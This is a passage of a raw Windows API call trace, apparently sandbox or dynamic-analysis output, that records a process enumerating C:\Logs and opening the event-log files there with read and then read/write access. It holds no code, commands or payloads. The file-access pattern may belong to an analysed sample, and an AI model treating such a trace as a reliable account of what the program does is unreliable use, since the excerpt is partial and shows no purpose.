ftCreationTime.dwLowDateTime=0x50cef47f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cef47f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x2000002, cFileName="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", cAlternateFileName="MIA726~1.EVT")) returned 1 [0086.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0086.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0086.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0086.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ac8 [0086.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0086.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0086.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0086.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0086.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0086.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0086.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0086.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0086.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0086.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.558] AreFileApisANSI () returned 1 [0086.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpUsedDefaultChar=0x0) returned 57 [0086.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0086.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0086.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0086.559] AreFileApisANSI () returned 1 [0086.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0086.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0086.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 57 [0086.559] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.559] GetFileType (hFile=0x348) returned 0x1 [0086.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0086.559] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.559] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.559] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.559] CloseHandle (hObject=0x348) returned 1 [0086.560] AreFileApisANSI () returned 1 [0086.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0086.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a5b0 [0086.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 57 [0086.560] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.560] GetFileType (hFile=0x348) returned 0x1 [0086.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0086.560] CloseHandle (hObject=0x348) returned 1 [0086.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0086.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0086.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.561] AreFileApisANSI () returned 1 [0086.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0086.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0086.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 57 [0086.561] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cef47f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cef47f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0086.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0086.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0086.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0086.561] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.561] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.561] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", cAlternateFileName="MI08CB~1.EVT")) returned 1 [0086.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0086.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e00 [0086.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0086.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0086.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e00 | out: hHeap=0x20000) returned 1 [0086.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8ce30 [0086.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0086.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0086.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0086.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0086.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0086.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0086.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0086.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0086.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0086.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0086.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0086.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0086.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0086.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0086.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.562] AreFileApisANSI () returned 1 [0086.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpUsedDefaultChar=0x0) returned 63 [0086.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0086.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0086.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0086.563] AreFileApisANSI () returned 1 [0086.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0086.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e4f8 [0086.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6e4f8, cchWideChar=63 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 63 [0086.563] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.563] GetFileType (hFile=0x348) returned 0x1 [0086.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0086.563] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.563] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.563] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.564] CloseHandle (hObject=0x348) returned 1 [0086.564] AreFileApisANSI () returned 1 [0086.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0086.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6ea48 [0086.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=63 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 63 [0086.564] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.564] GetFileType (hFile=0x348) returned 0x1 [0086.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0086.564] CloseHandle (hObject=0x348) returned 1 [0086.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0086.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0086.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0086.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0086.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0086.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0086.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.565] AreFileApisANSI () returned 1 [0086.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0086.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e030 [0086.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=63 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 63 [0086.565] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0086.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0086.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0086.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.565] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc967f17e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc967f17e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Dhcp-Client%4Admin.evtx", cAlternateFileName="MI8270~1.EVT")) returned 1 [0086.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0086.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0086.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0086.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0086.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0086.565] 